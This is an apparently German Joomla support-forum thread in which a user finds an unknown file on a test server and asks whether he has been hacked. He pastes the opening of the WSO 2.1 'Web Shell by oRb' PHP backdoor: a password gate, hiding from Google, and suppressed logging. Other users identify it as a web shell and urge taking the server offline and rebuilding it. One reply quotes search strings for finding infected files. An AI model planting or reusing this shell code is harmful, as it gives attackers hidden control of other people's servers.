Thema geschlossen
Seite 1 von 2 1 2 LetzteLetzte
Ergebnis 1 bis 10 von 20

Thema: gehackt oder was ?

  1. #1
    Neu an Board
    Registriert seit
    01.08.2010
    Beiträge
    44
    Bedankte sich
    1
    Erhielt 0 Danksagungen
    in 0 Beiträgen

    Standard gehackt oder was ?

    Hi
    ich habe eine Test Seite in dem ich nur Module etc. teste, und das kennt keiner außer ich, eben grade habe ich was entdeckt die ich nicht hochgeladen habe. Eine inc.php das auch meine Avira als Virus meldet. ich habe das aufgerufen und verlangt nach eine Password.

    Dann habe ich das mit eine Editor geöffnet ist ziemlich langes ding. in dem viele Sachen stehen.

    Am Anfang steht das hier, vielleicht kann mir jemand helfen. Wurde ich gehackt oder was. ich benutze Joomla 1.5.22

    Code:
    <?php
    /* WSO 2.1 (Web Shell by oRb) */
    $auth_pass = "63a95555544kkjjkkjjk9e85481845";
    $color = "#df5";
    $default_action = 'FilesMan';
    @define('SELF_PATH', __FILE__);
    if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
    	header('HTTP/1.0 404 Not Found');
    	exit;
    }
    @session_start();
    @error_reporting(0);
    @ini_set('error_log',NULL);
    @ini_set('log_errors',0);
    @ini_set('max_execution_time',0);
    @set_time_limit(0);
    @set_magic_quotes_runtime(0);
    @define('VERSION', '2.1');
    if( get_magic_quotes_gpc() ) {
    	function stripslashes_array($array) {
    		return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
    	}
    	$_POST = stripslashes_array($_POST);
    }
    function printLogin() {
    	?>
    	<center>
    	<form method=post>
    	Password: <input type=password name=pass><input type=submit value='>>'>
    	</form></center>
    	<?php
    	exit;
    }
    if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
    	if( empty( $auth_pass ) ||
    		( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
    		$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
    	else
    		printLogin();
    MFG

  2. #2
    Wohnt hier Avatar von cylance
    Registriert seit
    10.11.2010
    Beiträge
    2.313
    Bedankte sich
    189
    Erhielt 592 Danksagungen
    in 562 Beiträgen

    Standard

    Bingo.
    Auch schon mal nach "Web Shell by oRb" gegooglet?

    http://www.htmlcenter.com/blog/check...s-with-google/
    http://www.htmlcenter.com/blog/webshell-hack-an-update/
    http://www****dolfmaduro.com/2010/10/...-shell-by-orb/
    http://www.davidlprowse.com/forums/s...ead.php?p=7901


    Tja, grosse Frage: ist das Dein eigener Server oder ist die Site bei einem Hoster

    Mal sehen was Flotte dazu meint

    Ich bezweifle im Moment, dass ein Abarbeiten Der Liste zum Erfolg führt.
    Geändert von cylance (19.01.2011 um 06:48 Uhr)
    Meine Kristallkugel hat einen Sprung und die Tarotkarten hat's vom Tisch geweht. Detailierte Informationen sind hilfreich.
    We offer three kinds of service: good - chea p - fast. u can pick 2 of them
    FAQ vorn im Forum gelesen?

  3. #3
    Neu an Board
    Registriert seit
    01.08.2010
    Beiträge
    44
    Bedankte sich
    1
    Erhielt 0 Danksagungen
    in 0 Beiträgen

    Standard

    Zitat Zitat von cylance Beitrag anzeigen
    Bingo.
    Auch schon mal nach "Web Shell by oRb" gegooglet?

    http://www.htmlcenter.com/blog/check...s-with-google/
    http://www.htmlcenter.com/blog/webshell-hack-an-update/

    Tja, grosse Frage: ist das Dein eigener Server oder ist die Site bei einem Hoster

    Mal sehen was Flotte dazu meint

    Ich bezweifle im Moment, dass ein Abarbeiten Der Liste zum Erfolg führt.
    Ja, Google habe ich auch schon nach Web Shell by oRb gesucht, Das ist meine eigene Server, Die beiden links habe ich nicht verstanden, gibts die auch auf Deutsch. Welche liste soll ich abarbeiten?

    Ich denke eines von dem Modules hat dies Script erstellt, Ich teste sehr viele scripte und Module die ich mal da und da runterlade, das script wurde am 16.01.2011 erstellt, an dem seit wo ich viel getestet hatte.
    Auser dem meine test seite kennt doch niemand, und das ist föllig nur zum testen, warum sollten die grade die seite hacken wollen wen ich 100 andere normale seiten habe.


    mfg
    Geändert von Real_Mann (19.01.2011 um 06:50 Uhr)

  4. #4
    Wohnt hier Avatar von cylance
    Registriert seit
    10.11.2010
    Beiträge
    2.313
    Bedankte sich
    189
    Erhielt 592 Danksagungen
    in 562 Beiträgen

    Standard

    Also wenn das Dein eigener Server ist, solltest Du ihn erst mal ganz schnell vom Netz nehmen.

    Das kann auch sein, dass Die Kiste schon über ein Rootkit ferngesteuert wird. und da reicht ein einfaches Desinfizieren nicht aus.
    Meine Kristallkugel hat einen Sprung und die Tarotkarten hat's vom Tisch geweht. Detailierte Informationen sind hilfreich.
    We offer three kinds of service: good - chea p - fast. u can pick 2 of them
    FAQ vorn im Forum gelesen?

  5. #5
    Neu an Board
    Registriert seit
    01.08.2010
    Beiträge
    44
    Bedankte sich
    1
    Erhielt 0 Danksagungen
    in 0 Beiträgen

    Standard

    Zitat Zitat von cylance Beitrag anzeigen
    Also wenn das Dein eigener Server ist, solltest Du ihn erst mal ganz schnell vom Netz nehmen.

    Das kann auch sein, dass Die Kiste schon über ein Rootkit ferngesteuert wird. und da reicht ein einfaches Desinfizieren nicht aus.
    Kein Panik !!
    Hatte mein beitrag geändert, hastdu die änderung gelesen, Das denke ich nicht das jemand auf mein Server was gemacht hat, ich habe alle möglichen sachen durchsucht, und keine spur, wie schon gesagt das hat beschtimmt eins von dem Module erstellt, und keine hacker erstellt seine scripte direckt auf home verzeichnis.

    mfg

  6. #6
    Wohnt hier Avatar von cylance
    Registriert seit
    10.11.2010
    Beiträge
    2.313
    Bedankte sich
    189
    Erhielt 592 Danksagungen
    in 562 Beiträgen

    Standard

    Zitat Zitat von Real_Mann Beitrag anzeigen
    Kein Panik !!
    Hatte mein beitrag geändert, hastdu die änderung gelesen, Das denke ich nicht das jemand auf mein Server was gemacht hat, ich habe alle möglichen sachen durchsucht, und keine spur, wie schon gesagt das hat beschtimmt eins von dem Module erstellt, und keine hacker erstellt seine scripte direckt auf home verzeichnis.

    mfg
    Hallo,
    hörst Du nicht zu? Ich bezweifle doch stark, dass dieses Script von Dir oder Deinen Modulen ist.
    Nimm den Server vom Netz und warte die Antwort unserer Profis hier ab.
    Meine Kristallkugel hat einen Sprung und die Tarotkarten hat's vom Tisch geweht. Detailierte Informationen sind hilfreich.
    We offer three kinds of service: good - chea p - fast. u can pick 2 of them
    FAQ vorn im Forum gelesen?

  7. #7
    Neu an Board
    Registriert seit
    01.08.2010
    Beiträge
    44
    Bedankte sich
    1
    Erhielt 0 Danksagungen
    in 0 Beiträgen

    Standard

    So wie ich schon sagte, Kein Panik. ich hatte eine Admin Template getestet. und da war auch das lamer Schwein. als ich den template installiert habe wurde auch eine Upload Scrip mit installiert, das heist irgend wie bekommt jemand bescheid das dieser template installiert wurde und er seine script hochladen und den harten spielen kann, aber bei mir hatte er keine Chance weil weil ROOT nur mit eine API aus meine pc zugänglich ist.

    Also das ist mir auch eine leere, nie wieder Module einfach so installieren immer jeden Einzel angucken.

    MFG

  8. #8
    Rumburack
    Gast

    Standard

    weil ROOT nur mit eine API aus meine pc zugänglich ist.
    Ich lach mich tot über soviel Müll. Wenn da ein shellscript läuft interessiert das garnichts mehr. Manch einer muß erst eine Klage am Hals haben bevor er sein Gehirn etwas bemüht.

  9. #9
    Kommt häufiger vorbei Avatar von killbill
    Registriert seit
    09.09.2006
    Beiträge
    492
    Bedankte sich
    34
    Erhielt 121 Danksagungen
    in 115 Beiträgen

    Standard

    Zitat Zitat von Real_Mann Beitrag anzeigen
    Kein Panik !!
    Hatte mein beitrag geändert, hastdu die änderung gelesen, Das denke ich nicht das jemand auf mein Server was gemacht hat, ich habe alle möglichen sachen durchsucht, und keine spur, wie schon gesagt das hat beschtimmt eins von dem Module erstellt, und keine hacker erstellt seine scripte direckt auf home verzeichnis.
    hi

    du solltest wirklich auf die leute hier hören, die einfach mehr erfahrung haben. das ist keine panikmache oder arrogantes getue sondern der tipp, der einfach unumgänglich ist. meine meinung ist an dieser stelle, auch wenn es kein server wäre, also "nur mein persönlicher pc", der nur am netz ist, wenn ich dran sitze, würde ich klar dazu tendieren, die kiste platt zu machen, raten it-foren übrigens oft auch. ich meine, du wirst einfach nie gewissheit haben, ob die kiste sauber ist... und das geht ja nur gut, bis sich ein user was auf deiner seite holt... nein danke.

    gruss
    killbill
    "Es ist dort draußen, und wenn du es kriegst, geh zum Arzt, und versuchs loszuwerden.." - Zitat aus dem Film "Reichtum ist keine Schande"

  10. Erhielt Danksagungen von:


  11. #10
    Wohnt hier Avatar von Kubik-Rubik
    Registriert seit
    20.10.2005
    Ort
    Kubik-Rubik.de
    Beiträge
    2.737
    Bedankte sich
    177
    Erhielt 1.059 Danksagungen
    in 793 Beiträgen

    Standard

    Zitat Zitat von Real_Mann Beitrag anzeigen
    So wie ich schon sagte, Kein Panik.
    Wir haben keine Panik, diese solltest du haben!

    Wenn du etwas englisch könntest, dann würden dir diese Zeilen die Lockerheit schnell vertreiben:

    A few weeks ago, I wrote about the fact that one of my website’s was hacked and exploited by a script apparently known as “WebShell by oRB”. At the time, I was hoping that the issue had been fixed, but I quickly learned that it hadn’t. At least once each day, the hack re-appeared on our website in different ways through different files.

    ...

    I then performed an extremely exhaustive search of our Web server looking for all files that included “WSO”, “eval(base64″ and/or “preg_replace” and dumped that list of files into a log. I then poured over the log file and found about 15 infected files (most of them using preg_replace to somehow insert the malicious code into our site).
    Gute Nacht!
    Joomla! Extensions by Kubik-Rubik.de
    Keine Beantwortung von Supportanfragen per PN

    Joomla! braucht Dich!

  12. Erhielt Danksagungen von:


Thema geschlossen
Seite 1 von 2 1 2 LetzteLetzte

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein